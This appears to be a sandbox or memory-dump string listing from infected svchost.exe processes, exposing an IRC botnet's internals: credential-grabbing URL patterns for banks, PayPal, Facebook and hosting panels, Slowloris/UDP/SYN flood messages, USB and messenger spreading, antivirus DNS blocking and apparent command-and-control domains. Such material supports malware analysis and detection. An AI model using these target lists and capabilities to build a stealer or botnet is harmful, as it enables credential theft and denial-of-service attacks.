%5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\System32\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1144_rwx_00850000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1188_rwx_00B60000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG 